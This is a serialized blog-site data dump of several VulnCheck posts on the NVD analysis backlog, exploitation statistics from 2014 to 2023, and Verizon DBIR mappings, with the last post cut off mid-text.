NIST to fix NVD backlog by September – insists it’s right agency to run vulnerability database","https:\u002F\u002Fwww.thestack.technology\u002Fturf-wars-nist-says-it-will-fix-nvd-backlog-by-september-insists-its-the-right-agency-to-run-the-vulnerability-database\u002F",{"title":73099,"source":10841,"link":73100,"date":72596},"NIST has a plan to clear the vulnerability analysis backlog","https:\u002F\u002Fwww.cybersecuritydive.com\u002Fnews\u002Fnist-vulnerability-analysis-backlog\u002F717631\u002F",{"title":73102,"source":73103,"link":73104,"date":72596},"NIST taps Analygence to help fix vulnerability database backlog","Nextgov\u002FFCW","https:\u002F\u002Fwww.nextgov.com\u002Fcybersecurity\u002F2024\u002F05\u002Fnist-taps-analygence-help-fix-vulnerability-database-backlog\u002F397028\u002F",{"title":73106,"source":23286,"link":73107,"date":71680},"The NIST Finally Hires a Contractor to Manage CVEs","https:\u002F\u002Fsecurityboulevard.com\u002F2024\u002F06\u002Fthe-nist-finally-hires-a-contractor-to-manage-cves\u002F",{"title":73109,"source":3481,"link":73110,"date":71680},"NIST turns to IT consultants to clear National Vulnerability Database backlog","https:\u002F\u002Fwww.theregister.com\u002F2024\u002F06\u002F03\u002Fnist_cve_backlog\u002F",{"title":73102,"source":73112,"link":73113,"date":71680},"Washington Technology","https:\u002F\u002Fwashingtontechnology.com\u002Fcontracts\u002F2024\u002F06\u002Fnist-taps-analygence-help-fix-vulnerability-database-backlog\u002F397068\u002F",{"title":73115,"source":73116,"link":73117,"date":73118},"Understanding the impact of the NIST NVD backlog on MSPs","Security Magazine","https:\u002F\u002Fwww.securitymagazine.com\u002Farticles\u002F100795-understanding-the-impact-of-the-nist-nvd-backlog-on-msps","2024-07-16",{"title":73120,"source":73121,"link":73122,"date":69238},"Why the NVD Backlog Boosts the Case for Exposure Management","Security Magazine 
UK","https:\u002F\u002Finsight.scmagazineuk.com\u002Fwhy-the-nvd-backlog-boosts-the-case-for-exposure-management",{"title":73124,"source":73125,"link":73126,"date":68288},"Veracode highlights security risks of GenAI coding tools","SearchSecurity","https:\u002F\u002Fwww.techtarget.com\u002Fsearchsecurity\u002Fnews\u002F366600097\u002FVeracode-highlights-security-risks-of-GenAI-coding-tools",{"title":73128,"source":11233,"link":73129,"date":68021},"Combating alert fatigue by prioritizing malicious intent","https:\u002F\u002Fwww.scworld.com\u002Fperspective\u002Fcombating-alert-fatigue-by-prioritizing-malicious-intent",{"title":73131,"source":73132,"link":73133,"date":66190},"CVE backlog update: The NVD struggles as attackers change tactics","Security Intelligence","https:\u002F\u002Fsecurityintelligence.com\u002Farticles\u002Fcve-backlog-update-nvd-struggles-attackers-change-tactics\u002F",{"title":73135,"source":73136,"link":73137,"date":65671},"Beyond Disclosure: Transforming Vulnerability Data Into Actionable Security","InfoSecurityMagazine","https:\u002F\u002Fwww.infosecurity-magazine.com\u002Fnews-features\u002Fvulnerability-data-actionable\u002F",{"title":73139,"source":34002,"link":73140,"date":28159},"Security experts claim the CVE Program isn’t up to scratch anymore — inaccurate scores and lengthy delays mean the system needs updated","https:\u002F\u002Fwww.itpro.com\u002Fsecurity\u002Fsecurity-experts-claim-the-cve-program-isnt-up-to-scratch-anymore-inaccurate-scores-and-lengthy-delays-mean-the-system-needs-updated",[73142],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":73144,"toc":73297},[73145,73151,73154,73157,73160,73163,73165,73179,73183,73186,73197,73200,73203,73205,73208,73214,73216,73222,73225,73228,73233,73237,73240,73243,73248,73252,73255,73260,73264,73267,73278,73284,73286,73288,73290,73292],[18,73146,73147],{},[68,73148],{":width":10862,"alt":73149,"src":73150},"Weekly CVE's Published by 
Status","\u002Fblog\u002Fnvd-backlog-exploitation\u002Fweekly-cve.png",[18,73152,73153],{},"On February 12, 2024, the NIST National Vulnerability Database (NVD) began slowing the processing and enrichment of new vulnerabilities. Since that date, 12,720 new vulnerabilities and counting have been added to NVD but 11,885 have not been analyzed or enriched with critical data that help security professionals determine what software has been affected by a vulnerability. By February 15, the NVD website announced that users might experience \"delays in analysis efforts.\"",[18,73155,73156],{},"Numerous prominent and influential voices in the industry have warned about how this gives malicious threat actors an upper hand in weaponizing vulnerabilities with exploits that greatly increases supply chain risks across critical sectors.",[18,73158,73159],{},"With the recent slowdown of the NIST National Vulnerability Database (NVD), it's crucial to understand the gravity of the situation. Nation-state threat actors and ransomware gangs continue to target organizations with devastating consequences, while our own house is in disarray. Although we can speculate on the underlying causes leading to the NVD's near cessation, one thing is clear: threats continue to persist and show no signs of following NIST's lead.",[18,73161,73162],{},"This research aims to illustrate this gravity, utilizing data sourced from the NVD and VulnCheck’s exploit and vulnerability service. 
The research focused on new CVEs published by NVD between February 12 and May 20, 2024.",[61,73164,43093],{"id":43092},[22,73166,73167,73170,73173,73176],{},[25,73168,73169],{},"93.4% of new vulnerabilities have not been analyzed by the National Vulnerability Database (NVD) since February 12, 2024.",[25,73171,73172],{},"50.8% of VulnCheck Known Exploited Vulnerabilities have not been analyzed by the National Vulnerability Database (NVD) since February 12, 2024 (Source: VulnCheck KEV).",[25,73174,73175],{},"55.9% of Weaponized Vulnerabilities have not been analyzed by the National Vulnerability Database (NVD) since February 12, 2024.",[25,73177,73178],{},"82% of CVEs with a Proof-of-Concept Exploit have not been analyzed by the National Vulnerability Database (NVD) since February 12, 2024.",[61,73180,73182],{"id":73181},"nist-nvds-important-role-in-the-vulnerability-ecosystem","NIST NVD's Important Role in the Vulnerability Ecosystem",[18,73184,73185],{},"For over 20 years, the NIST NVD has played a critical role as a primary source for software vulnerability data, serving organizations worldwide. 
The NVD has provided three primary functions:",[22,73187,73188,73191,73194],{},[25,73189,73190],{},"CVE Enrichment: CVSS scoring, CWE, CPE configurations, and reference tags.",[25,73192,73193],{},"Consumable Data Access: Consistent and easy-to-consume JSON, CVEs with enrichment from one source.",[25,73195,73196],{},"CNA\u002FVendor Accountability: CVE rejections and data quality.",[18,73198,73199],{},"While there is debate over the NVD’s approach, it has a long track record as the go-to source for enriched CVE data and is incorporated into several government mandates as the source of truth for vulnerability management requirements.",[18,73201,73202],{},"As the security community reacts to an uncertain future for the NVD and scrambles to fill this void, it is important to provide real-world insight into the threats that persist as the NVD falters to provide a critical service for the world.",[61,73204,65430],{"id":65429},[18,73206,73207],{},"The outlook for the NVD is bleak. As of now, 93.4% of vulnerabilities remain unanalyzed. Out of 12,720 new vulnerabilities added to the database since February 12, 11,885 have not been analyzed by the NVD.",[18,73209,73210],{},[68,73211],{":width":10862,"alt":73212,"src":73213},"NVD Status Since February 12th, 2024","\u002Fblog\u002Fnvd-backlog-exploitation\u002Fnvd-status.png",[61,73215,65442],{"id":65441},[18,73217,73218,73219,27987],{},"As of May 20th, 50.8% of Known Exploited Vulnerabilities are unanalyzed by the NVD. 
Thirty out of 59 Known Exploited Vulnerabilities (KEVs) have not been analyzed by the NVD (Source: ",[47,73220,1233],{"href":2871,"rel":73221},[51],[18,73223,73224],{},"Several of the Known Exploited Vulnerabilities that are unanalyzed impact technologies including Microsoft Windows, Adobe ColdFusion, Progress Flowmon, ChatGPT, Qnap, Netlify OpenMetadata, WordPress and others.",[18,73226,73227],{},"VulnCheck Known Exploited Vulnerabilities (KEV) catalog is a real-time collection of known exploited vulnerabilities that is inclusive of CISA KEV, made available as a free community resource with publicly referenceable citations.",[18,73229,73230],{},[68,73231],{":width":10862,"alt":73149,"src":73232},"\u002Fblog\u002Fnvd-backlog-exploitation\u002Fvulncheck-kev-nvd-status.png",[61,73234,73236],{"id":73235},"unaddressed-weaponized-cves","Unaddressed Weaponized CVEs",[18,73238,73239],{},"A weaponized vulnerability is typically one with an exploit that delivers a substantial payload. For example, Metasploit exploits are considered \"weaponized\" (as they can deliver meterpreter or other advanced payloads).",[18,73241,73242],{},"As of May 20th, 55.9% of Weaponized Vulnerabilities are unanalyzed by the NVD. 
Thirty-eight out of 68 Weaponized Vulnerabilities have not been analyzed by the NVD (Source: VulnCheck Exploit and Vulnerability Intelligence).",[18,73244,73245],{},[68,73246],{":width":10862,"alt":73149,"src":73247},"\u002Fblog\u002Fnvd-backlog-exploitation\u002Fvulncheck-weaponized.png",[61,73249,73251],{"id":73250},"unaddressed-vulnerabilities-w-proof-of-concept-code","Unaddressed Vulnerabilities w\u002F Proof-of-Concept Code",[18,73253,73254],{},"As of May 20th, 82% of CVEs with a Proof-of-Concept Exploit are unanalyzed by the NVD: Of the 482 CVEs that have a Proof-of-Concept Exploit associated, 396 remain unanalyzed by the NVD.",[18,73256,73257],{},[68,73258],{":width":10862,"alt":73149,"src":73259},"\u002Fblog\u002Fnvd-backlog-exploitation\u002Fvulncheck-poc.png",[61,73261,73263],{"id":73262},"the-path-forward-for-cveorg-and-nist-nvd","The Path Forward for CVE.org and NIST NVD",[18,73265,73266],{},"While uncertainty around the future of NIST NVD remains, it’s in the best interest of the CVE community to coordinate efforts to fill the void that NIST has currently created.",[22,73268,73269,73272,73275],{},[25,73270,73271],{},"For CVE numbering authorities (CNAs), it benefits downstream consumers of CVE data to provide more complete data when publishing new CVEs. CNAs should work toward enriching CVE records as completely as possible, including the submission of product names, vendor names, version numbers, thorough descriptions, broad references, CPE, CVSS, and CWE.",[25,73273,73274],{},"CVE.org\u002FMITRE and NVD should focus on automating CVE enrichment where possible and focus on completing the gaps where CNAs haven’t supplied sufficient information. 
NVD should deprioritize analyzing every CVE submission and move to a model where they establish trust with CNAs and the CVE program that doesn’t require a manual review of every CVE.",[25,73276,73277],{},"CVE.org\u002FMITRE should consider accelerating the Authorized Data Publisher (ADP) program to validate and allow third-party contributions to enrich CVE.org data. This would include incorporating projects like CISA’s Vulnrichment project, CISA KEV and other third party sources.",[18,73279,73280,73281,59],{},"Regardless of the uncertainty, VulnCheck is committed to contributing back to the security community. VulnCheck is providing vulnerability enrichment services, including CPE and access to NIST-NVD and CVE Mitre data from a single source at no cost. Anyone can register for the free service here: ",[47,73282,40745],{"href":40745,"rel":73283},[51],[18,73285,65635],{},[61,73287,202],{"id":201},[18,73289,205],{},[18,73291,208],{},[18,73293,211,73294,217],{},[47,73295,216],{"href":214,"rel":73296},[51],{"title":219,"searchDepth":220,"depth":220,"links":73298},[73299,73300,73301,73302,73303,73304,73305,73306],{"id":43092,"depth":220,"text":43093},{"id":73181,"depth":220,"text":73182},{"id":65429,"depth":220,"text":65430},{"id":65441,"depth":220,"text":65442},{"id":73235,"depth":220,"text":73236},{"id":73250,"depth":220,"text":73251},{"id":73262,"depth":220,"text":73263},{"id":201,"depth":220,"text":202},"A look into the real dangers of exploitation lurking in the NVD 
Backlog",{"slug":73309},"nvd-backlog-exploitation","\u002Fblog\u002Fnvd-backlog-exploitation",{"title":65394,"description":73307},"blog\u002Fnvd-backlog-exploitation",[33173],"h-AVc7KGBLpXLdcG9NM_M0NOykPL7NaESS9b6zX40tA",{"id":73316,"title":73317,"articles":7,"authors":73318,"body":73320,"date":73363,"description":73364,"extension":234,"image":7,"link":7,"meta":73365,"navigation":237,"path":73367,"seo":73368,"series":7,"stem":73369,"subtype":7,"tags":7,"__hash__":73370},"blog\u002Fblog\u002Fcve-community.md","Expanding Access to CVE Data - CVE Program’s CVE List added to VulnCheck Community",[73319],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":73321,"toc":73359},[73322,73327,73330,73334,73347,73350,73352],[18,73323,73324],{},[68,73325],{":width":10862,"alt":319,"src":73326},"\u002Fblog\u002Fcve-community\u002Fvulncheck-community-cve.png",[18,73328,73329],{},"In recent months, as the NIST NVD has struggled to keep pace with the surging influx of CVEs, the CVE Program has advocated for consumers of CVE data to consider utilizing it as their primary source. This shift marks a departure from the traditional reliance on NIST NVD, which historically offered enriched CVE data in an easily navigable format. While both sources offer distinct advantages and drawbacks, the security community has underscored the need for more accessible ways to access CVE data.",[61,73331,73333],{"id":73332},"cve-program-cve-list-added-to-vulncheck-community","CVE Program CVE List Added to VulnCheck Community",[18,73335,73336,73337,73340,73341,73346],{},"To address this concern and enhance access to CVE data, VulnCheck has taken the initiative to provide the CVE Program's CVE list via VulnCheck API. Effective immediately, the CVE Program CVE List is freely accessible to the ",[47,73338,28667],{"href":40745,"rel":73339},[51]," using the VulnCheck API. 
Users can now retrieve CVE Program data via the ",[47,73342,73345],{"href":73343,"rel":73344},"https:\u002F\u002Fdocs.vulncheck.com\u002Findices\u002Findices-m-r#mitre-cvelist-v5",[51],"VulnCheck API index \"mitre-cvelist-v5\"",", as well as download the complete JSON through a backup of the data.",[18,73348,73349],{},"Now the security community is empowered with access to both NIST NVD and CVE Program data delivered through API using a single source, facilitating easy comparison and selection based on organizational needs. This is in addition to VulnCheck KEV, which offers visibility into over 2,350 Known Exploited Vulnerabilities, enhancing the spectrum of available vulnerability intelligence.\nWe remain committed to providing the highest fidelity vulnerability intelligence to the community while ensuring consistent and reliable access.",[61,73351,202],{"id":201},[18,73353,73354,73355,59],{},"Organizations seeking dependable access to 400+ vulnerability sources are encouraged to explore ",[47,73356,73358],{"href":214,"rel":73357},[51],"VulnCheck's Exploit & Vulnerability Intelligence service",{"title":219,"searchDepth":220,"depth":220,"links":73360},[73361,73362],{"id":73332,"depth":220,"text":73333},{"id":201,"depth":220,"text":202},"2024-05-16","Given the security community's ongoing concerns about the reliability and performance of NIST's National Vulnerability Database, we recognized a growing need to address these challenges with alternative sources.",{"slug":73366},"cve-community","\u002Fblog\u002Fcve-community",{"title":73317,"description":73364},"blog\u002Fcve-community","-ikgnr2N5Yvi-Dp8cXsG5RWq5QPEk-5q_YbPVEEAp8I",{"id":73372,"title":73373,"articles":73374,"authors":73382,"body":73384,"date":72932,"description":73400,"extension":234,"image":7,"link":7,"meta":73636,"navigation":237,"path":73638,"seo":73639,"series":7,"stem":73640,"subtype":7,"tags":73641,"__hash__":73642},"blog\u002Fblog\u002Fstate-of-exploitation-a-decade.md","State of Exploitation - A 
Peek into the Last Decade of Vulnerability Exploitation",[73375,73379],{"title":73376,"source":61436,"link":73377,"date":73378},"Risky Biz News: Microsoft ties security goals to exec compensation","https:\u002F\u002Fnews.risky.biz\u002Frisky-biz-news-microsoft-ties-security-goals-to-exec-compensation\u002F?ref=risky-business-news-newsletter","2024-05-06",{"title":73380,"source":43755,"link":73381,"date":60948},"The fundamental problem preventing CIP compliance in the cloud today","https:\u002F\u002Fenergycentral.com\u002Fc\u002Fiu\u002Ffundamental-problem-preventing-cip-compliance-cloud-today",[73383],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":73385,"toc":73619},[73386,73391,73394,73397,73401,73403,73406,73409,73412,73414,73418,73429,73433,73444,73448,73451,73454,73458,73462,73465,73469,73475,73478,73489,73493,73499,73502,73512,73516,73522,73525,73529,73536,73540,73543,73557,73561,73564,73577,73580,73583,73585,73593,73600,73608,73610,73612,73614],[18,73387,73388],{},[68,73389],{":width":10862,"alt":58618,"src":73390},"\u002Fblog\u002Fstate-of-exploitation-a-decade\u002Fvulns-exploitation-exploits.png",[18,73392,73393],{},"In this series, we will explore vulnerability disclosure and exploitation, drawing insights from VulnCheck’s Exploit and Vulnerability Intelligence service.",[18,73395,73396],{},"Our goal is to offer valuable perspectives for the security community, starting with an exploration of the last decade's trends in vulnerability disclosure, exploitation, weaponization and exploit availability from 2014 to 2023.",[1920,73398,73400],{"id":73399},"a-look-into-the-last-decade-of-vulnerability-exploitation-2014-2023","A Look into the Last Decade of Vulnerability Exploitation… 2014 - 2023",[61,73402,68327],{"id":68326},[18,73404,73405],{},"Over the past decade, security teams have faced unwavering persistence by threat actors, evolving their tactics in response to security measures. 
While credential compromise and phishing made up the historical bulk of threat actor activity, as security controls such as MFA have become more widely adopted, adversaries have shifted their tactics to expand their reach using the exploitation of vulnerabilities to gain initial access into an organization.",[18,73407,73408],{},"Mandiant's M-Trends 2024 Report highlights a significant shift towards exploiting vulnerabilities, with 38% of intrusions in 2023 initiated through exploitation[1], and Verizon’s 2024 Data Breach Investigations Report (DBIR) reports a 180% increase in vulnerability exploitation.[2]",[18,73410,73411],{},"As we analyze CVE data, a clear pattern emerges: a surge in vulnerability disclosure, publicly available exploits, and known exploitation. This exponential growth underscores the pressing urgency of vulnerability management.",[61,73413,43093],{"id":43092},[993,73415,73417],{"id":73416},"growth-trends","Growth Trends",[22,73419,73420,73423,73426],{},[25,73421,73422],{},"CVEs with known exploitation grew at a 19.7% annual growth rate.",[25,73424,73425],{},"CVE disclosure grew at a 14.1% annual growth rate.",[25,73427,73428],{},"CVEs with publicly available Proof-of-Concept exploits grew at an 11.8% annual growth rate.",[993,73430,73432],{"id":73431},"exploitation-trends","Exploitation Trends",[22,73434,73435,73438,73441],{},[25,73436,73437],{},"1.1% of vulnerabilities are publicly known to have been exploited in the wild.",[25,73439,73440],{},"2% of vulnerabilities are known to be weaponized.",[25,73442,73443],{},"31% of vulnerabilities have Proof-of-Concept Exploit Code.",[61,73445,73447],{"id":73446},"the-rise-in-vulnerabilities-exploitation-and-poc-exploits","The Rise in Vulnerabilities, Exploitation and POC Exploits",[18,73449,73450],{},"Between 2014 and 2023, we witnessed a rapid escalation in vulnerabilities, publicly available exploits, and known exploitation. 
During this period, CVE disclosures surged at a 14.1% annual growth rate, unique CVEs with publicly available exploits increased by 11.8% annually, and the number of unique CVEs with known exploitation skyrocketed by 19.7% annually.",[18,73452,73453],{},"As the trend of increased vulnerability disclosure continues its rapid ascent, we note a similar rise in known exploitation and the availability of proof-of-concept exploits. This alignment serves as a clear indicator for security teams to anticipate a rise in known exploited vulnerabilities and the availability of POC exploit code.",[18,73455,73456],{},[68,73457],{":width":10862,"alt":58618,"src":73390},[61,73459,73461],{"id":73460},"zooming-in-known-exploited-vulnerabilities-weaponization-and-exploits","Zooming In: Known Exploited Vulnerabilities, Weaponization, and Exploits",[18,73463,73464],{},"Now let’s zoom further into the CVE data from 2014 to 2023 to get more perspective on exploitation, weaponization and the availability of Proof-of-Concept Exploits. This analysis offers foundational insights that can drive improved vulnerability prioritization outcomes.",[993,73466,73468],{"id":73467},"how-many-vulnerabilities-are-known-to-be-exploited-in-the-wild","How Many Vulnerabilities are Known to Be Exploited in the Wild?",[18,73470,73471],{},[68,73472],{":width":10862,"alt":73473,"src":73474},"Known to Be Exploited in the Wild","\u002Fblog\u002Fstate-of-exploitation-a-decade\u002Fknown-exploited-in-the-wild.png",[18,73476,73477],{},"Analysis using VulnCheck’s Known Exploited Vulnerabilities (KEV) catalog reveals that between 2014 and 2023, 1.1% of all published vulnerabilities were exploited in the wild. 
We highly recommend prioritizing known exploitation as an immediate and optimal starting point for addressing vulnerabilities, particularly those that pose the highest threat to an organization, especially when exposed to the internet.",[1925,73479,73480],{},[18,73481,73482,73488],{},[295,73483,73484],{},[47,73485,73487],{"href":2871,"rel":73486},[51],"VulnCheck Known Exploited Vulnerabilities Catalog"," is the most comprehensive index of publicly referenceable vulnerabilities known to be exploited in the wild and encompasses all data from CISA KEV. We offer this to the community at no cost.",[993,73490,73492],{"id":73491},"how-many-vulnerabilities-are-known-to-be-weaponized","How Many Vulnerabilities are Known to be Weaponized?",[18,73494,73495],{},[68,73496],{":width":10862,"alt":73497,"src":73498},"Known to be Weaponized","\u002Fblog\u002Fstate-of-exploitation-a-decade\u002Fweaponized.png",[18,73500,73501],{},"Expanding our analysis to encompass weaponized vulnerabilities uncovers that between 2014 and 2023, 2% of all disclosed vulnerabilities have been weaponized. 
Given their heightened risk, weaponized vulnerabilities naturally warrant prioritized attention for remediation, as they possess a high likelihood of being exploited in the wild, if not already.",[1925,73503,73504],{},[18,73505,73506,10515,73509,73511],{},[295,73507,73508],{},"What defines a weaponized vulnerability?",[1823,73510],{},"\nIt's one that has either been exploited in the wild or has an available exploit capable of delivering a significant payload.",[993,73513,73515],{"id":73514},"how-many-vulnerabilities-have-a-publicly-available-proof-of-concept-exploit","How many Vulnerabilities have a Publicly Available Proof-of-Concept Exploit?",[18,73517,73518],{},[68,73519],{":width":10862,"alt":73520,"src":73521},"POC Exploit","\u002Fblog\u002Fstate-of-exploitation-a-decade\u002Fpoc-exploit.png",[18,73523,73524],{},"Expanding our analysis to encompass vulnerabilities with a Proof-of-Concept (POC) exploit, we find that between 2014 and 2023, 31% of vulnerabilities have at least one POC exploit available.",[993,73526,73528],{"id":73527},"how-many-vulnerabilities-exploited-in-the-wild-have-a-publicly-available-proof-of-concept-exploit","How many Vulnerabilities Exploited in the Wild have a Publicly Available Proof-of-Concept Exploit?",[18,73530,73531,73535],{},[68,73532],{":width":10862,"alt":73533,"src":73534},"POC Exploit - KEV","\u002Fblog\u002Fstate-of-exploitation-a-decade\u002Fpoc-known-exploited-vulnerabilities.png","\nInterestingly, over the same period, 72.9% of vulnerabilities known to be exploited in the wild are associated with a POC exploit. This underscores that vulnerabilities with a known POC pose a significantly higher threat than those without. 
We will dive deeper into this correlation as we continue our research.",[993,73537,73539],{"id":73538},"considering-data-biases","Considering Data Biases",[18,73541,73542],{},"We all carry our own biases when it comes to data and its interpretation, and I'd like to offer some perspective on our observations. The primary focus of this series is examining VulnCheck data, which is sourced from hundreds of indexes. However, it's important to acknowledge that data biases persist. Therefore, we welcome feedback and additional insights that broaden our understanding.",[18,73544,73545,73546,982,73551,73556],{},"For instance, Cyentia’s report, “Prioritization to Prediction: Volume 1”[3], noted that 2% of published vulnerabilities had observed exploits in the wild. This closely aligns with VulnCheck’s definition of weaponization, suggesting consistency in trends over time, albeit from an earlier time period. We'd like to explore other reports on exploitation further and remain open to collaboration, so please share your thoughts on any other sources we can learn from. Personally, I'd suggest exploring ",[47,73547,73550],{"href":73548,"rel":73549},"https:\u002F\u002Fwww.cisco.com\u002Fc\u002Fdam\u002Fen\u002Fus\u002Fproducts\u002Fcollateral\u002Fsecurity\u002Fvulnerability-management\u002Fp2p-vulnerability-management-report.pdf",[51],"Cyentia's Prioritization to Prediction Vol. 9",[47,73552,73555],{"href":73553,"rel":73554},"https:\u002F\u002Fwww.bitsight.com\u002Fsites\u002Fdefault\u002Ffiles\u002F2024-04\u002Fbitsight-a-global-view-of-cisa-kev-catalog.pdf",[51],"Bitsight's Global View of CISA KEV Catalog"," which I plan to draw comparisons with throughout this series when I have the chance.",[61,73558,73560],{"id":73559},"expanding-our-research","Expanding Our Research",[18,73562,73563],{},"The aim of this post has been to lay down foundational research on vulnerability disclosure, known exploitation, weaponized vulnerabilities, and vulnerabilities with Proof-of-Concept exploits. 
While I’m not offering an immediate silver bullet for vulnerability prioritization, my hope is that this series provides useful insights that will provide an evidence-based understanding into vulnerabilities and exploitation. We do know that focusing on remediating known exploitation and weaponized vulnerabilities offers a substantial return on investment and is a useful place to start, especially when they're internet-facing on initial access devices.",[18,73565,73566,73567,64672,73570,982,73573,73576],{},"For those eager to dive deeper, I encourage you to research along with me as we explore the vulnerability and exploitation landscape. You can start by utilizing ",[47,73568,28667],{"href":40745,"rel":73569},[51],[47,73571,1233],{"href":2871,"rel":73572},[51],[47,73574,40672],{"href":40670,"rel":73575},[51],". In our next post, we’ll prioritize exploring exploitation across 2023 at a deeper level.",[18,73578,73579],{},"Until then...",[18,73581,73582],{},"Cheers,\nPatrick",[18,73584,3080],{},[18,73586,73587,73588],{},"[1] ",[47,73589,73592],{"href":73590,"rel":73591},"https:\u002F\u002Fservices.google.com\u002Ffh\u002Ffiles\u002Fmisc\u002Fm-trends-2024.pdf",[51],"Mandiant M-Trends 2024 Special Report",[18,73594,73595,73596],{},"[2] ",[47,73597,73599],{"href":64319,"rel":73598},[51],"Verizon 2024 DBIR",[18,73601,73602,73603],{},"[3] ",[47,73604,73607],{"href":73605,"rel":73606},"https:\u002F\u002Flearn-cloudsecurity.cisco.com\u002Fvulnerability-management-resources\u002Fvmc\u002Fprioritization-to-prediction-volume-1",[51],"Prioritization to Prediction: Volume 
1",[61,73609,202],{"id":201},[18,73611,205],{},[18,73613,208],{},[18,73615,211,73616,217],{},[47,73617,216],{"href":214,"rel":73618},[51],{"title":219,"searchDepth":220,"depth":220,"links":73620},[73621,73622,73626,73627,73634,73635],{"id":68326,"depth":220,"text":68327},{"id":43092,"depth":220,"text":43093,"children":73623},[73624,73625],{"id":73416,"depth":1266,"text":73417},{"id":73431,"depth":1266,"text":73432},{"id":73446,"depth":220,"text":73447},{"id":73460,"depth":220,"text":73461,"children":73628},[73629,73630,73631,73632,73633],{"id":73467,"depth":1266,"text":73468},{"id":73491,"depth":1266,"text":73492},{"id":73514,"depth":1266,"text":73515},{"id":73527,"depth":1266,"text":73528},{"id":73538,"depth":1266,"text":73539},{"id":73559,"depth":220,"text":73560},{"id":201,"depth":220,"text":202},{"slug":73637},"state-of-exploitation-a-decade","\u002Fblog\u002Fstate-of-exploitation-a-decade",{"title":73373,"description":73400},"blog\u002Fstate-of-exploitation-a-decade",[1280],"iOufMnkkvDOjahEE-bKNSAXDqyyObxpeLu25gf194xE",{"id":73644,"title":73645,"articles":7,"authors":73646,"body":73648,"date":73685,"description":73686,"extension":234,"image":7,"link":7,"meta":73687,"navigation":237,"path":73689,"seo":73690,"series":7,"stem":73691,"subtype":7,"tags":7,"__hash__":73692},"blog\u002Fblog\u002Fverizon-dbir-2024-mitre.md","Verizon's 2024 DBIR Report - Mapping Mitre Att&CK tactics and techniques to Incident Classification Patterns",[73647],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":73649,"toc":73681},[73650,73654,73657,73661,73672,73674],[61,73651,73653],{"id":73652},"_2024-verizon-dbir-report-mitre-attck-tactics-and-techniques-mapped-to-incident-classification-patterns","2024 Verizon DBIR Report: Mitre Att&CK tactics and techniques mapped to incident classification patterns",[18,73655,73656],{},"Verizon's annual DBIR report maps incident classification patterns to the Mitre Att&CK tactics and techniques. 
This one-pager offers visibility into these tactics and techniques for security practitioners, enabling them to focus on the techniques most frequently involved in data breaches.",[73658,73659],"pdf-view",{"url":73660},"\u002Fblog\u002Fverizon-dbir-2024-mitre\u002Fmitre.pdf",[18,73662,73663,73664,55527,73667,73669,73670,59],{},"You can access the 2024 Verizon DBIR's full report ",[47,73665,305],{"href":64319,"rel":73666},[51],[1823,73668],{},"You can download a PDF version of the Verizon DBIR MITRE ATT&CK mapping ",[47,73671,305],{"href":73660},[61,73673,202],{"id":201},[18,73675,73676,73677,73680],{},"Are you interested in gaining broader visibility into vulnerability intelligence and exploitation? If so, VulnCheck's ",[47,73678,216],{"href":214,"rel":73679},[51]," provides the broadest coverage to gain early access into the known. Register and demo our data today.",{"title":219,"searchDepth":220,"depth":220,"links":73682},[73683,73684],{"id":73652,"depth":220,"text":73653},{"id":201,"depth":220,"text":202},"2024-05-02","Verizon's 2024 annual DBIR report incident classification patterns mapped to the Mitre Att&CK tactics and techniques.",{"slug":73688},"verizon-dbir-2024-mitre","\u002Fblog\u002Fverizon-dbir-2024-mitre",{"title":73645,"description":73686},"blog\u002Fverizon-dbir-2024-mitre","5jMndLWxed2kO7Uwugr1zzTwrNK7Z2w66YwkWXs8Zwk",{"id":73694,"title":73695,"articles":7,"authors":73696,"body":73698,"date":73000,"description":73731,"extension":234,"image":7,"link":7,"meta":73732,"navigation":237,"path":73734,"seo":73735,"series":7,"stem":73736,"subtype":7,"tags":7,"__hash__":73737},"blog\u002Fblog\u002F2024-verizon-dbir.md","Verizon's 2024 DBIR Report - Mapping CIS Controls to Incident Classification Patterns",[73697],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":73699,"toc":73727},[73700,73704,73707,73710,73720,73722],[61,73701,73703],{"id":73702},"_2024-verizon-dbir-report-cis-contols-mapped-to-incident-classification-patterns","2024 
Verizon DBIR Report: CIS Controls Mapped to Incident Classification Patterns",[18,73705,73706],{},"Verizon's annual DBIR report maps incident classification patterns to the Center for Internet Security's (CIS) Critical Security Controls. This one-pager offers visibility into these controls for security practitioners, enabling them to focus on the highest priority controls most frequently involved in data breaches. The controls highlighted in red were added in 2024 and were not present in the 2023 DBIR report.",[73658,73708],{"url":73709},"\u002Fblog\u002Fverizon-dbir-2024\u002Fverizon-dbir-2024.pdf",[18,73711,73663,73712,14193,73715,73717,73718,59],{},[47,73713,305],{"href":64319,"rel":73714},[51],[1823,73716],{}," You can download a PDF version of the Verizon DBIR CIS Controls Mapping ",[47,73719,305],{"href":73709},[61,73721,202],{"id":201},[18,73723,73676,73724,73680],{},[47,73725,216],{"href":214,"rel":73726},[51],{"title":219,"searchDepth":220,"depth":220,"links":73728},[73729,73730],{"id":73702,"depth":220,"text":73703},{"id":201,"depth":220,"text":202},"Verizon's annual DBIR report incident classification patterns mapped to the Center for Internet Security's (CIS) Critical Security Controls.",{"slug":73733},"2024-verizon-dbir","\u002Fblog\u002F2024-verizon-dbir",{"title":73695,"description":73731},"blog\u002F2024-verizon-dbir","O1wWg8321T8NC3RxYUiOaCD8rQcDsjMr203eif_2nLo",{"id":73739,"title":73740,"articles":7,"authors":73741,"body":73743,"date":73836,"description":73837,"extension":234,"image":7,"link":7,"meta":73838,"navigation":237,"path":73840,"seo":73841,"series":7,"stem":73842,"subtype":7,"tags":73843,"__hash__":73844},"blog\u002Fblog\u002Fnvd-cpe-update.md","VulnCheck's CPE Coverage Update (3-weeks after launch)",[73742],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":73744,"toc":73830},[73745,73753,73756,73760,73766,73770,73775,73781,73785,73798,73801,73806,73813,73816,73822,73824],[18,73746,73747,73748,73752],{},"Three 
